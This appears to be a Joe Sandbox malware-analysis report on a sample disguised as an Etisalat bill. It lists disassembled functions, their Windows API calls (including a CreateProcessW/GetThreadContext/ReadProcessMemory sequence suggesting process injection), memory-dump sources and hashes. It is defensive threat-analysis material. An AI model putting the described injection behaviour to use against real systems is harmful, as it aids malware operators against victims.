                                      • Opcode ID: 4f9f4b3ff62d7d236cee0af5afd8eaf0e2c226c93d86e3e80e25a90067d9cdea
                                      • Instruction ID: 81db5a53e1b61ac3b0c18451402f9ab524daa87d4c85cfd9494c853e8254f293
                                      • Opcode Fuzzy Hash: 4f9f4b3ff62d7d236cee0af5afd8eaf0e2c226c93d86e3e80e25a90067d9cdea
                                      • Instruction Fuzzy Hash: E4114571614218BFDB208F68DC80ABEBBF8EF04B40F0084A9E805DB210E6719F409BA0
                                      Function 015E1300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015E1ABB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015E1B51
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015E1B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction ID: ffdec5c9f1e6c7719a0fcb7575ce6cfe859f9ac27eb22f0ffd225393a0531ce8
                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction Fuzzy Hash: 96621A30E14658DAEB24CFA4C844BDEB7B6FF58300F1091A9D20DEB294E7759E81CB59
                                      Function 00B8493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction ID: 32e4f88e2a6beb9dd27ed6d106dff7cb27f16197878d9e5187bf4cbea316695a
                                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction Fuzzy Hash: BC41A4716406079FDF2CEEA9C8809AF77EAEF80360B2485BDE8559B660D771DD40CB44
                                      Function 00B673E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00B9EE62
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00B9EEAC
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                        • Part of subcall function 00B809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B809F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: f6d6e587a293704bbfcc23f6853cde8237b4d4965b8ee37d34a2a61d803cb140
                                      • Instruction ID: af4d44a33e44b8d754275b3e6193fcfe00e047977dbe5efcd60dec7c60919e4c
                                      • Opcode Fuzzy Hash: f6d6e587a293704bbfcc23f6853cde8237b4d4965b8ee37d34a2a61d803cb140
                                      • Instruction Fuzzy Hash: 4C21D8709102589BCF51DF94C845BEE7BF99F49714F00409AE408E7341DFB8598ACFA1
                                      Function 00BC901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 08794ed9022467d35aca123a77f8b6133b1105c2d16d3e1ccfc3da7710f99799
                                      • Instruction ID: 6b4f3e8c46385f7e51af1c6fbb17acac80741128c75cf6d41347873ca5794ef1
                                      • Opcode Fuzzy Hash: 08794ed9022467d35aca123a77f8b6133b1105c2d16d3e1ccfc3da7710f99799
                                      • Instruction Fuzzy Hash: 3F01B971904258AEDB28D7A8CC5AFFE7BFCDB15301F00459FF552D2181E575A604D760
                                      Function 00BC9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00BC9B82
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BC9B99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: f63ed858088d7246e4beac40f1149c0bc39b5e035c17f3b82c51c777d40f9735
                                      • Instruction ID: dd7131ec48068769b0772f5d6a94edf6264bb1ee85696d87de07ee68daaad424
                                      • Opcode Fuzzy Hash: f63ed858088d7246e4beac40f1149c0bc39b5e035c17f3b82c51c777d40f9735
                                      • Instruction Fuzzy Hash: E8D05E7994030EABDB109B94DC4EFEA772CE704700F0042B1BF549A0A2DEB055988B92
                                      Function 00BDCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a449ff16e2a50c21dfefecdd6f1329892eb20fef62e8e40970ca324c891ebab
                                      • Instruction ID: 4dee52d924ef3270b3d2162eb173010b3b130134df21ce6f94e12488d115e2ae
                                      • Opcode Fuzzy Hash: 6a449ff16e2a50c21dfefecdd6f1329892eb20fef62e8e40970ca324c891ebab
                                      • Instruction Fuzzy Hash: 61F103706083019FCB14DF28C494A6AFBE5FB88314F1489AEF8999B351E775E945CF82
                                      Function 00B6F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B803D3
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B803DB
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B803E6
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B803F1
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B803F9
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B80401
                                        • Part of subcall function 00B76259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B6FA90), ref: 00B762B4
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B6FB2D
                                      • OleInitialize.OLE32(00000000), ref: 00B6FBAA
                                      • CloseHandle.KERNEL32(00000000), ref: 00BA49F2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 1986988660-0
                                      • Opcode ID: b48779204e8c92a6fe896d5300a3a25d34cecd39e20c2c4299c0444a48633380
                                      • Instruction ID: 3a7f8ede74e15919ceb8c04286141409ad93173f8b96590836be577ea17dd2bf
                                      • Opcode Fuzzy Hash: b48779204e8c92a6fe896d5300a3a25d34cecd39e20c2c4299c0444a48633380
                                      • Instruction Fuzzy Hash: 3881A9B0921290CEC7A4EF39F9547297BE4FB5870871085BAD099C7A72EB35550ACF70
                                      Function 00B643DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00B64401
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B644A6
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B644C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$_memset
                                      • String ID:
                                      • API String ID: 1505330794-0
                                      • Opcode ID: 94c69f80319389a9a2c3ae510ad87379f6ca83782b9afa2334be0127bd96ac92
                                      • Instruction ID: ff7bb3f492987c942047c752c32f19974906b436c7826ed5e4fda937bbf630a1
                                      • Opcode Fuzzy Hash: 94c69f80319389a9a2c3ae510ad87379f6ca83782b9afa2334be0127bd96ac92
                                      • Instruction Fuzzy Hash: D1318FB0504701CFD721DF24D885B9BBBF8FB49708F00096EE59A87391DB75A944CBA2
                                      Function 00B8594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8A3AB: __NMSG_WRITE.LIBCMT ref: 00B8A3D2
                                        • Part of subcall function 00B8A3AB: __NMSG_WRITE.LIBCMT ref: 00B8A3DC
                                      • __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8A408: GetModuleFileNameW.KERNEL32(00000000,00C243BA,00000104,?,00000001,00000000), ref: 00B8A49A
                                        • Part of subcall function 00B8A408: ___crtMessageBoxW.LIBCMT ref: 00B8A548
                                        • Part of subcall function 00B832DF: ___crtCorExitProcess.LIBCMT ref: 00B832E5
                                        • Part of subcall function 00B832DF: ExitProcess.KERNEL32 ref: 00B832EE
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 9f4df0e2c6631fc84e6f6a37f0fe5a66dd1c9f1bf7e67dc86000d48ce793679b
                                      • Instruction ID: 0b6cacb1a326c329ee5f66dddcdb8316c92e3329f3dead22d5187d9f81f1ce0f
                                      • Opcode Fuzzy Hash: 9f4df0e2c6631fc84e6f6a37f0fe5a66dd1c9f1bf7e67dc86000d48ce793679b
                                      • Instruction Fuzzy Hash: B101D231200A15DFE6357B25D842B6E72C8DF52B71F5000AAF400AA1F1DE709D01C3A1
                                      Function 00BC9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BC97D2,?,?,?,?,?,00000004), ref: 00BC9B45
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BC9B5B
                                      • CloseHandle.KERNEL32(00000000,?,00BC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BC9B62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: fb09cde9447f85ed7e770f8dbfd0b00350c56bc04288c37fa756092217bee97d
                                      • Instruction ID: f46abb932857799684bdc4a38d9a810ae3a1c6f12c70d527e4180ab714cf39f3
                                      • Opcode Fuzzy Hash: fb09cde9447f85ed7e770f8dbfd0b00350c56bc04288c37fa756092217bee97d
                                      • Instruction Fuzzy Hash: 1CE08632180219B7E7211B54EC49FDA7B68EB05761F108120FB147E0E08BB129119799
                                      Function 00BC8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00BC8FA5
                                        • Part of subcall function 00B82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B89C64), ref: 00B82FA9
                                        • Part of subcall function 00B82F95: GetLastError.KERNEL32(00000000,?,00B89C64), ref: 00B82FBB
                                      • _free.LIBCMT ref: 00BC8FB6
                                      • _free.LIBCMT ref: 00BC8FC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                      • Instruction ID: f42ff87a3b50ceb1d264dff711b9271fa2bc2e81122c52e0586fa0cf987fd71d
                                      • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                      • Instruction Fuzzy Hash: 1EE012B17097015ACA24B678AD51F9357EE9F48350B180C9DB549DB152DE24E841C264
                                      Function 00B6AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: 459a52d0124a01f80bcbd384bec2b25123b569e72abe2f9a26d082d03022fa8d
                                      • Instruction ID: a5b7a3dd9d9f9a6d118bbae9383808272f936eb651905992271eaec6522f2a09
                                      • Opcode Fuzzy Hash: 459a52d0124a01f80bcbd384bec2b25123b569e72abe2f9a26d082d03022fa8d
                                      • Instruction Fuzzy Hash: 2D221870518241DFCB24EF14C494B6ABBF1FF45304F1489ADE89A9B262D735ED85CB82
                                      Function 00B64DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: EA06
                                      • API String ID: 4104443479-3962188686
                                      • Opcode ID: 160b5ee482278f7439063201103ba9a6d6df867baeb6448cb31733123770a82b
                                      • Instruction ID: 7c6dcacc0136cd503d33240d1748b0c2b5fd92abbbe03864a9f963386c73f43d
                                      • Opcode Fuzzy Hash: 160b5ee482278f7439063201103ba9a6d6df867baeb6448cb31733123770a82b
                                      • Instruction Fuzzy Hash: 82416C32A049549BCF295B6488917BF7FE6EB05300F2844F4F8429A282C72E9D41C7A1
                                      Function 00B6492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00B64992
                                        • Part of subcall function 00B835AC: __lock.LIBCMT ref: 00B835B2
                                        • Part of subcall function 00B835AC: DecodePointer.KERNEL32(00000001,?,00B649A7,00BB81BC), ref: 00B835BE
                                        • Part of subcall function 00B835AC: EncodePointer.KERNEL32(?,?,00B649A7,00BB81BC), ref: 00B835C9
                                        • Part of subcall function 00B64A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B64A73
                                        • Part of subcall function 00B64A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B64A88
                                        • Part of subcall function 00B63B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B63B7A
                                        • Part of subcall function 00B63B4C: IsDebuggerPresent.KERNEL32 ref: 00B63B8C
                                        • Part of subcall function 00B63B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C262F8,00C262E0,?,?), ref: 00B63BFD
                                        • Part of subcall function 00B63B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00B63C81
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B649D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-0
                                      • Opcode ID: 69e3f131e70ff53dc773a14dbfddf48291e3543e59c94cb1265a7719a27f8c64
                                      • Instruction ID: db773b408e172327c9e32ec4539d8c28613ba49f571884dd4f41798464252b21
                                      • Opcode Fuzzy Hash: 69e3f131e70ff53dc773a14dbfddf48291e3543e59c94cb1265a7719a27f8c64
                                      • Instruction Fuzzy Hash: 86118C719283519FC310EF68DC45A1EFBE8FB98B10F00466EF045872B1DB749A46CB92
                                      Function 00B65DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00B65981,?,?,?,?), ref: 00B65E27
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00B65981,?,?,?,?), ref: 00B9E19C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 08dcddef0032342e7357d51bc18e893aab29ae45739c57bfb7113836d067a107
                                      • Instruction ID: 812ad36304bcb4fe056f322de5c932c9c4063bcaf6fb9c4e5350beef71d174f8
                                      • Opcode Fuzzy Hash: 08dcddef0032342e7357d51bc18e893aab29ae45739c57bfb7113836d067a107
                                      • Instruction Fuzzy Hash: 14019E70244709BEFB344E24CC8AF763ADCEB05768F108358BAE56A1E0C6B95E558B51
                                      Function 00B80FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B8594C: __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8594C: __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8594C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      • std::exception::exception.LIBCMT ref: 00B8102C
                                      • __CxxThrowException@8.LIBCMT ref: 00B81041
                                        • Part of subcall function 00B887DB: RaiseException.KERNEL32(?,?,?,00C1BAF8,00000000,?,?,?,?,00B81046,?,00C1BAF8,?,00000001), ref: 00B88830
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
